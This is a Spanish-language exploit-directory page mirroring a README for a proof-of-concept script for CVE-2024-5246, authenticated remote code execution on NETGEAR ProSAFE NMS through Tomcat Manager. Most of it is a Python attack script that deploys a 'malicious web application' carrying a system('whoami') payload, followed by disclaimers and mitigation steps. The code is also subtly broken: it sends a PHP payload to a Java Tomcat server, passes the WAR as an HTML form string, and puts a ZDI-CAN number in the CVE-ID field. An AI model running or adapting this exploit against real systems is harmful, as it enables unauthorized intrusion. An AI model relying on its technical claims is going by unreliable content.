Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-5246 — Script Python de prueba de concepto que demuestra ejecución remota de código autenticada en NETGEAR ProSAFE Network Management System a través de Apache Tomcat vulnerable mediante el despliegue de una aplicación web maliciosa. | Kitploit
Herramientas/GitHubGitHub/abdurahmon3236/cve-2024-5246
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

Script Python de prueba de concepto que demuestra ejecución remota de código autenticada en NETGEAR ProSAFE Network Management System a través de Apache Tomcat vulnerable mediante el despliegue de una aplicación web maliciosa.

Ver Repositorio
22hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto (PoC) para Ejecución Remota de Código en NETGEAR ProSAFE Network Management System

Este repositorio contiene un script de Prueba de Concepto (PoC) que demuestra una vulnerabilidad de Ejecución Remota de Código (RCE) en NETGEAR ProSAFE Network Management System. La vulnerabilidad se debe al uso de una versión vulnerable de Apache Tomcat dentro del instalador del producto. Este problema permite a atacantes autenticados ejecutar código arbitrario en instalaciones afectadas.

Descripción de la Vulnerabilidad

CVE-ID: ZDI-CAN-22868

Resumen: NETGEAR ProSAFE Network Management System contiene una vulnerabilidad de ejecución remota de código debido al uso de una versión vulnerable de Apache Tomcat. Un atacante con autenticación puede explotar esta vulnerabilidad para ejecutar código arbitrario en el sistema afectado en el contexto de SYSTEM.

Versiones Afectadas:

  • Versiones de NETGEAR ProSAFE Network Management System con versiones vulnerables de Apache Tomcat.

Autenticación: Requerida

Detalles de la PoC

Esta PoC demuestra cómo un atacante puede explotar la vulnerabilidad para lograr ejecución remota de código. El fallo específico reside en el instalador del producto debido al uso de una versión desactualizada o vulnerable de Apache Tomcat.

Script de la PoC

El siguiente script ilustra cómo explotar esta vulnerabilidad RCE. Asegúrese de tener los permisos adecuados antes de ejecutar esta PoC.

Importante: Esta PoC es solo con fines educativos y no debe utilizarse para actividades no autorizadas o maliciosas.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""

# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

Explicación

  1. Configuración: Establezca target_url en la URL del Administrador de Tomcat del sistema objetivo, y actualice username y password con credenciales válidas.
  2. Payload: El payload es un script PHP simple que ejecuta un comando del sistema para demostrar la ejecución de código.
  3. Función de Explotación: La función exploit_rce() envía una solicitud POST para desplegar la aplicación web maliciosa.
  4. Despliegue: El script intenta desplegar una nueva aplicación web con el payload malicioso e imprime el resultado.

Consideraciones Importantes

  • Permisos: Asegúrese de tener permiso explícito para probar esta vulnerabilidad en el sistema objetivo. Las pruebas no autorizadas son ilegales y no éticas.
  • Entorno de Pruebas: Realice las pruebas en un entorno controlado para evitar afectar sistemas de producción.
  • Uso Ético: Use esta PoC de manera responsable y solo en contextos autorizados.

Mitigación

Para mitigar esta vulnerabilidad, siga los siguientes pasos:

  1. Actualizar Tomcat: Actualice a una versión de Apache Tomcat que haya corregido la vulnerabilidad.
  2. Asegurar el Acceso: Asegúrese de que el Administrador de Tomcat y otras interfaces sensibles estén protegidas y sean accesibles solo para usuarios autorizados.
  3. Revisar Configuraciones: Revise y endurezca periódicamente la configuración de las aplicaciones web y servidores.

Siguiendo estos pasos, puede abordar la vulnerabilidad RCE en NETGEAR ProSAFE Network Management System y mejorar la seguridad general.


Este README.md proporciona una descripción detallada y el script de la PoC para la vulnerabilidad RCE, incluyendo instrucciones de configuración, consideraciones y consejos de mitigación.

Descargar herramienta